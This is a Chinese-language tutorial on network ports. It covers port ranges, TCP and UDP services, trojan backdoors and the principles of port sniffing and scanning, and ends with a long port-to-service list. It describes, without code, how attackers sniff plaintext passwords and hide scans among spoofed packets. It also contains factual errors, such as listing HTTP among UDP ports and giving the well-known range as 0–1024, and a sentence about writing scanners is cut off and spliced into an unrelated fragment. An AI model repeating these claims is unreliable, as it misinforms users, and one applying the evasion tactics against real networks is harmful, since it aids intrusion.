随着计算机网络技术的发展，原来物理上的接口（如键盘、鼠标、网卡、显示卡等输入/输出接口）已不能满足网络通信的要求，TCP/IP协议作为网络通信的标准协­议就解决了这个通信难题。TCP/IP协议集成到操作系统的内核中，这就相当于在操作系统中引入了一种新的输入/输出接口技术，因为在TCP/IP协议中引入了­一种称之为"Socket（套接字）"应用程序接口。有了这样一种接口技术，一台计算机就可以通过软件的方式与任何一台具有Socket接口的计算机进行通信。­端口在计算机编程上也就是"Socket接口"。

有了这些端口后，这些端口又是如何工作呢？例如一台服务器为什么可以同时是Web服务器，也可以是FTP服务器，还可以是邮件服务器等等呢？其中一个很重要的原­因是各种服务采用不同的端口分别提供不同的服务，比如：通常TCP/IP协议规定Web采用80号端口，FTP采用21号端口等，而邮件服务器是采用25号端口­。这样，通过不同端口，计算机就可以与外界进行互不干扰的通信。

据专家们分析，服务器端口数最大可以有65535个，但是实际上常用的端口才几十个，由此可以看出未定义的端口相当多。这是那么多黑客程序都可以采用某种方法，­定义出一个特殊的端口来达到入侵的目的的原因所在。为了定义出这个端口，就要依靠某种程序在计算机启动之前自动加载到内存，强行控制计算机打开那个特殊的端口。­这个程序就是"后门"程序，这些后门程序就是常说的木马程序。简单的说，这些木马程序在入侵前是先通过某种手段在一台个人计算机中植入一个程序，打开某个（些）­特定的端口，俗称"后门"（BackDoor），使这台计算机变成一台开放性极高（用户拥有极高权限）的FTP服务器，然后从后门就可以达到侵入的目的。

二、端口的分类

端口的分类根据其参考对象不同有不同划分方法，如果从端口的性质来分，通常可以分为以下三类：
（1）公认端口（Well Known
Ports）：这类端口也常称之为"常用端口"。这类端口的端口号从0到1024，它们紧密绑定于一些特定的服务。通常这些端口的通信明确表明了某种服务的协议­，这种端口是不可再重新定义它的作用对象。例如：80端口实际上总是HTTP通信所使用的，而23号端口则是Telnet服务专用的。这些端口通常不会像木马这­样的黑客程序利用。为了使大家对这些常用端口多一些认识，在本章后面将详细把这些端口所对面应的服务进行列表，供各位理解和参考。
（2） 注册端口（Registered
Ports）：端口号从1025到49151。它们松散地绑定于一些服务。也是说有许多服务绑定于这些端口，这些端口同样用于许多其他目的。这些端口多数没有明­确的定义服务对象，不同程序可根据实际需要自己定义，如后面要介绍的远程控制软件和木马程序中都会有这些端口的定义的。记住这些常见的程序端口在木马程序的防护­和查杀上是非常有必要的。常见木马所使用的端口在后面将有详细的列表。
（3） 动态和/或私有端口（Dynamic and/or Private
Ports）：端口号从49152到65535。理论上，不应把常用服务分配在这些端口上。实际上，有些较为特殊的程序，特别是一些木马程序就非常喜欢用这些端­口，因为这些端口常常不被引起注意，容易隐蔽。

如果根据所提供的服务方式的不同，端口又可分为"TCP协议端口"和"UDP协议端口"两种。因为计算机之间相互通信一般采用这两种通信协议。前面所介绍的"连­接方式"是一种直接与接收方进行的连接，发送信息以后，可以确认信息是否到达，这种方式大多采用TCP协议；另一种是不是直接与接收方进行连接，只管把信息放在­网上发出去，而不管信息是否到达，也就是前面所介绍的"无连接方式"。这种方式大多采用UDP协议，IP协议也是一种无连接方式。对应使用以上这两种通信协议的­服务所提供的端口，也就分为"TCP协议端口"和"UDP协议端口"。

使用TCP协议的常见端口主要有以下几种：
（1）
FTP：定义了文件传输协议，使用21端口。常说某某计算机开了FTP服务便是启动了文件传输服务。下载文件，上传主页，都要用到FTP服务。

（2）
Telnet：它是一种用于远程登陆的端口，用户可以以自己的身份远程连接到计算机上，通过这种端口可以提供一种基于DOS模式下的通信服务。如以前的BBS是­纯字符界面的，支持BBS的服务器将23端口打开，对外提供服务。
（3）
SMTP：定义了简单邮件传送协议，现在很多邮件服务器都用的是这个协议，用于发送邮件。如常见的免费邮件服务中用的就是这个邮件服务端口，所以在电子邮件设置­中常看到有这么SMTP端口设置这个栏，服务器开放的是25号端口。

（4）
POP3：它是和SMTP对应，POP3用于接收邮件。通常情况下，POP3协议所用的是110端口。也是说，只要你有相应的使用POP3协议的程序（例如Fo­xmail或Outlook），就可以不以Web方式登陆进邮箱界面，直接用邮件程序就可以收到邮件（如是163邮箱就没有必要先进入网易网站，再进入自己的邮­箱来收信）。
使用UDP协议端口常见的有：
（1）
HTTP：这是大家用得最多的协议，它就是常说的"超文本传输协议"。上网浏览网页时，就得在提供网页资源的计算机上打开80号端口以提供服务。常说"WWW服­务"、"Web服务器"用的就是这个端口。
（2） DNS：用于域名解析服务，这种服务在Windows
NT系统中用得最多的。因特网上的每一台计算机都有一个网络地址与之对应，这个地址是常说的IP地址，它以纯数字+"."的形式表示。然而这却不便记忆，于是出­现了域名，访问计算机的时候只需要知道域名，域名和IP地址之间的变换由DNS服务器来完成。DNS用的是53号端口。

（3）
SNMP：简单网络管理协议，使用161号端口，是用来管理网络设备的。由于网络设备很多，无连接的服务就体现出其优势 。

（4）
OICQ：OICQ程序既接受服务，又提供服务，这样两个聊天的人才是平等的。OICQ用的是无连接的协议，也是说它用的是UDP协议。OICQ服务器是使用8­000号端口，侦听是否有信息到来，客户端使用4000号端口，向外发送信息。如果上述两个端口正在使用（有很多人同时和几个好友聊天），就顺序往上加。

在计算机的6万多个端口，通常把端口号为1024以内的称之为常用端口，这些常用端口所对应的服务通常情况下是固定的。表1所列的都是服务器默认的端口，不允许­改变，一般通信过程都主要用到这些端口。
表1
服务类型默认端口服务类型默认端口
Echo7Daytime13
FTP21Telnet23
SMTP25Time37
Whois43DNS53
Gopher70Finger79
WWW80POP3110
NNTP119IRC194

另外代理服务器常用以下端口：
（1）.
HTTP协议代理服务器常用端口号：80/8080/3128/8081/9080
（2）. SOCKS代理协议服务器常用端口号：1080
（3）. FTP协议代理服务器常用端口号：21
（4）. Telnet协议代理服务器常用端口：23
三、端口在黑客中的应用

像木马之类的黑客程序，就是通过对端口的入侵来实现其目的的。在端口的利用上，黑客程序通常有两种方式，那就是"端口侦听"和"端口扫描"。

"端口侦听"与"端口扫描"是黑客攻击和防护中经常要用到的两种端口技术，在黑客攻击中利用它们可以准确地寻找攻击的目标，获取有用信息，在个人及网络防护方面­通过这种端口技术的应用可以及时发现黑客的攻击及一些安全漏洞。下面首先简单介绍一下这两种端口技术的异同。

"端口侦听"是利用某种程序对目标计算机的端口进行监视，查看目标计算机上有哪能些端口是空闲、可以利用的。通过侦听还可以捕获别人有用的信息，这主要是用在黑­客软件中，但对于个人来说也是非常有用的，可以用侦听程序来保护自己的计算机，在自己计算机的选定端口进行监视，这样可以发现并拦截一些黑客的攻击。也可以侦听­别人计算机的指定端口，看是否空闲，以便入侵。
"端口扫描"（port
scanning）是通过连接到目标系统的TCP协议或UDP协议端口，来确定什么服务正在运行，然后获取相应的用户信息。现在有许多人把"端口侦听"与"端口­扫描"混为一谈，根本分不清什么样的情况下要用侦听技术，什么样的情况下要用扫描技术。不过，现在的这类软件也似乎对这两种技术有点模糊了，有的干脆把两个功能­都集成在一块。

"端口侦听"与"端口扫描"有相似之处，也有区别的地方，相似的地方是都可以对目标计算机进行监视，区别的地方是"端口侦听"属于一种被动的过程，等待别人的连­接的出现，通过对方的连接才能侦听到需要的信息。在个人应用中，如果在设置了当侦听到有异常连接立即向用户报告这个功能时，就可以有效地侦听黑客的连接企图，及­时把驻留在本机上的木马程序清除掉。这个侦听程序一般是安装在目标计算机上。用在黑客中的"端口侦听"通常是黑客程序驻留在服务器端等待服务器端在进行正常活动­时捕获黑客需要的信息，然后通过UDP协议无连接方式发出去。而"端口扫描"则是一种主动过程，它是主动对目标计算机的选定端口进行扫描，实时地发现所选定端口­的所有活动（特别是对一些网上活动）。扫描程序一般是安装在客户端，但是它与服务器端的连接也主要是通过无连接方式的UDP协议连接进行。

在网络中，当信息进行传播的时候，可以利用工具，将网络接口设置在侦听的模式，便可将网络中正在传播的信息截获或者捕获到，从而进行攻击。端口侦听在网络中的任­何一个位置模式下都可实施进行，而黑客一般都是利用端口侦听来截取用户口令。

四、端口侦听原理

以太网（Ethernet）协议的工作方式是将要发送的数据包发往连接在一起的所有计算机。在包头中包括有应该接收数据包的计算机的正确地址，因为只有与数据包­中目标地址一致的那台计算机才能接收到信息包。但是当计算机工作在侦听模式下，不管数据包中的目标物理地址是什么，计算机都将可以接收到。当同一网络中的两台计­算机通信的时候，源计算机将写有目的计算机地址的数据包直接发向目的计算机，或者当网络中的一台计算机同外界的计算机通信时，源计算机将写有目的计算机IP地址­的数据包发向网关。但这种数据包并不能在协议栈的高层直接发送出去，要发送的数据包必须从TCP/IP协议的IP协议层交给网络接口--数据链路层。网络接口不­会识别IP地址的，在网络接口中，由IP协议层来的带有IP地址的数据包又增加了一部分以太网的帧头信息。在帧头中，有两个域分别为只有网络接口才能识别的源计­算机和目的计算机的物理地址，这是一个48位的地址，这个48位的地址是与IP地址相对应的。换句话说，一个IP地址也会对应一个物理地址。对于作为网关的计算­机，由于它连接了多个网络，它也就同时具备有很多个IP地址，在每个网络中它都有一个。而发向网络外的帧中继携带的是网关的物理地址。

以太网中填写了物理地址的帧从网络端口中（或者从网关端口中）发送出去，传送到物理的线路上。如果局域网是由一条粗同轴电缆或细同轴电缆连接成的，那么数字信号­在电缆上传输信号就能够到达线路上的每一台计算机。再当使用集线器的时候，发送出去的信号到达集线器，由集线器再发向连接在集线器上的每一条线路。这样在物理线­路上传输的数字信号也就能到达连接在集线器上的每个计算机了。当数字信号到达一台计算机的网络接口时，正常状态下网络接口对读入数据帧进行检查，如数据帧中携带­的物理地址是自己的或者物理地址是广播地址，那么就会将数据帧交给IP协议层软件。对于每个到达网络接口的数据帧都要进行这个过程的。但是当计算机工作在侦听模­式下，所有的数据帧都将被交给上层协议软件处理。

当连接在同一条电缆或集线器上的计算机被逻辑地分为几个子网的时候，那么要是有一台计算机处于侦听模式，它可以接收到发向与自己不在同一个子网（使用了不同的掩­码、IP地址和网关）的计算机的数据包，在同一个物理信道上传输的所有信息都可以被接收到。

在UNIX系统上，当拥有超级权限的用户要想使自己所控制的计算机进入侦听模式，只需要向Interface（网络接口）发送I/O控制命令，就可以使计算机设­置成侦听模式了。而在Windows

9x的系统中则不论用户是否有权限都将可以通过直接运行侦听工具就可以实现。

在端口处于侦听时，常常要保存大量的信息（也包含很多的垃圾信息），并将对收集的信息进行大量的整理，这样就会使正在侦听的计算机对其他用户的请求响应变的很慢­。同时侦听程序在运行的时候需要消耗大量的处理器时间，如果在这时就详细的分析包中的内容，许多包就会来不及接收而被漏走。所以侦听程序很多时候就会将侦听得到­的包存放在文件中等待以后分析。分析侦听到的数据包是很头疼的事情，因为网络中的数据包都非常之复杂。两台计算机之间连续发送和接收数据包，在侦听到的结果中必­然会加一些别的计算机交互的数据包。侦听程序将同一TCP协议会话的包整理到一起就相当不容易，如果还期望将用户详细信息整理出来就需要根据协议对包进行大量的­分析。

现在网络中所使用的协议都是较早前设计的，许多协议的实现都是基于一种非常友好的，通信的双方充分信任的基础。在通常的网络环境之下，用户的信息包括口令都是以­明文的方式在网上传输的，因此进行端口侦听从而获得用户信息并不是一件难点事情，只要掌握有初步的TCP/IP协议知识就可以轻松的侦听到想要的信息的。

五、端口扫描原理

"端口扫描"通常指用同一信息对目标计算机的所有所需扫描的端口进行发送，然后根据返回端口状态来分析目标计算机的端口是否打开、是否可用。"端口扫描"行为的­一个重要特征是：在短时期内有很多来自相同的信源地址传向不同的目的地端口的包。

对于用端口扫描进行攻击的人来说，攻击者总是可以做到在获得扫描结果的同时，使自己很难被发现或者说很难被逆向跟踪。为了隐藏攻击，攻击者可以慢慢地进行扫描。­除非目标系统通常闲着（这样对一个没有listen端口的数据包都会引起管理员的注意），有很大时间间隔的端口扫描是很难被识别的。隐藏源地址的方法是发送大量­的欺骗性的端口扫描包（1000个），其中只有一个是从真正的源地址来的。这样，即使全部包（1000）都被察觉，被记录下来，也没有人知道哪个是真正的信源地­址。能发现的仅仅是"曾经被扫描过"。也正因为这样那些黑客们才乐此不彼地继续大量使用这种端口扫描技术来达到他们获取目标计算机信息、并进行恶意攻击。

通常进行端口扫描的工具目前主要采用的是端口扫描软件，也通称之为"端口扫描器"，端口扫描可以为提供三个用途：

（1）识别目标系统上正在运行的TCP协议和UDP协议服务。
（2）识别目标系统的操作系统类型（Windows 9x, Windows
NT，或UNIX，等）。
（3）识别某个应用程序或某个特定服务的版本号。

端口扫描器是一种自动检测远程或本地计算机安全性弱点的程序，通过使用扫描器你可不留痕迹的发现远程服务器的各种TCP协议端口的分配及提供的服务，还可以得知­它们所使用的软件版本！这就能让间接的了解到远程计算机所存在的安全问题。

端口扫描器通过选用远程TCP/IP协议不同的端口的服务，记录目标计算机端口给予的回答的方法，可以搜集到很多关于目标计算机的各种有用信息（比如：是否有端­口在侦听？是否允许匿名登陆？是否有可写的FTP目录，是否能用TELNET等。

端口扫描器并不是一个直接攻击网络漏洞的程序，它仅仅能帮助发现目标机的某些内在的弱点。一个好的扫描器还能对它得到的数据进行分析，帮助查找目标计算机的漏洞­。但它不会提供一个系统的详细步骤。

端口扫描器在扫描过程中主要具有以下三个方面的能力：
（1） 发现一个计算机或网络的能力；
（2）
一旦发现一台计算机，就有发现目标计算机正在运行什么服务的能力；
（3）
通过测试目标计算机上的这些服务，发现存在的漏洞的能力。

编写扫描器程序必须要很多TCP/IP协议程序编写和C，Perl和或SHELL语言的知识。需要一些Socket编程的背景，一种在开发客户/服务应 端口服务。）。

六、常用端口

在计算机的6万多个端口，通常把端口号为1024以内的称之为常用端口，这些常用端口所对应的服务通常情况下是固定的，所以了解这些常用端口在一定程序上是非常­必要的，下表2列出了计算机的常用端口所对应的服务（注：在这列表中各项"="前面的数字为端口号，"="后面的为相应端口服务。）。

1=tcpmux（TCP协议 Port Service
Multiplexer）401=ups（Uninterruptible Power
Supply）
2=compressnet=Management Utility402=genie（Genie Protocol）
3=compressnet=Compression Process403=decap
5=rje（Remote Job Entry）404=nced
7=echo=Echo405=ncld
9=discard406=imsp（Interactive Mail Support Protocol）
11=systat,Active Users407=timbuktu
13=daytime408=prm-sm（Prospero Resource Manager Sys. Man.）
17=qotd（Quote of the Day）409=prm-nm（Prospero Resource Manager
Node Man.）
18=msp（Message Send Protocol）410=decladebug（DECLadebug Remote
Debug
Protocol）
19=Character Generator411=rmt（Remote MT Protocol）
20=FTP-data（File Transfer [Default
Data]）412=synoptics-trap（Trap
Convention Port）
21=FTP（File Transfer [Control]）413=smsp
22=ssh414=infoseek
23=telnet415=bnet
24private mail system416=silverplatter
25=smtp（Simple Mail Transfer）417=onmux
27=nsw-fe（NSW User System FE）418=hyper-g
29=msg-icp419=ariel1
31=msg-auth420=smpte
33=Display Support Protocol421=ariel2
35=private printer server422=ariel3
37=time423=opc-job-start（IBM Operations Planning and Control
Start）
38=rap（Route Access Protocol）424=opc-job-track（IBM Operations
Planning and
Control Track）
39=rlp（Resource Location Protocol）425=icad-el（ICAD）
41=graphics426=smartsdp
42=nameserver（WINS Host Name Server）427=svrloc（Server
Location）
43=nicname（Who Is）428=ocs_cmu
44=mpm-flags（MPM FLAGS Protocol）429=ocs_amu
45=mpm（Message Processing Mole [recv]）430=utmpsd
46=mpm-snd（MPM [default send]）431=utmpcd
47=ni-ftp432=iasd
48=Digital Audit Daemon433=nnsp
49=tacacs（Login Host Protocol （TACACS））434=mobileip-agent
50=re-mail-ck（Remote Mail Checking Protocol）435=mobilip-mn
51=la-maint（IMP Logical Address Maintenance）436=dna-cml
52=xns-time（XNS Time Protocol）437=comscm
53=Domain Name Server438=dsfgw
54=xns-ch（XNS Clearinghouse）439=dasp（dasp Thomas Obermair）
55=isi-gl（ISI Graphics Language）440=sgcp
56=xns-auth（XNS Authentication）441=decvms-sysmgt
57= private terminal access442=cvc_hostd
58=xns-mail（XNS Mail）443=https（https Mcom）
59=private file service444=snpp（Simple Network Paging Protocol）
61=ni-mail（NI MAIL）445=microsoft-ds
62=acas（ACA Services）446=ddm-rdb
63=whois+whois+447=ddm-dfm
64=covia（Communications Integrator （CI））448=ddm-byte
65=tacacs-ds（TACACS-Database Service）449=as-servermap
66=sql*net（Oracle SQL*NET）450=tserver
67=bootps（Bootstrap Protocol Server）451=sfs-smp-net（Cray
Network Semaphore
server）
68=bootpc（Bootstrap Protocol Client）452=sfs-config（Cray SFS
config server）
69=tftp（Trivial File Transfer）453=creativeserver
70=gopher454=contentserver
71=netrjs-1,Remote Job Service455=creativepartnr
72=netrjs-2,Remote Job Service456=macon-tcp
73=netrjs-3,Remote Job Service457=scohelp
74=netrjs-4,Remote Job Service458=appleqtc（apple quick time）
75=private dial out service459=ampr-rcmd
76=deos（Distributed External Object Store）460=skronk
77=private RJE service461=datasurfsrv
78=vettcp462=datasurfsrvsec
79=finger463=alpes
80=http（World Wide Web HTTP）464=kpasswd
81=hosts2-ns（HOSTS2 Name Server）465=ssmtp
82=xfer（XFER Utility）466=digital-vrc
83=mit-ml-dev（MIT ML Device）467=mylex-mapd
84=ctf（Common Trace Facility）468=photuris
85=mit-ml-dev（MIT ML Device）469=rcp（Radio Control Protocol）
86=mfcobol（Micro Focus Cobol）470=scx-proxy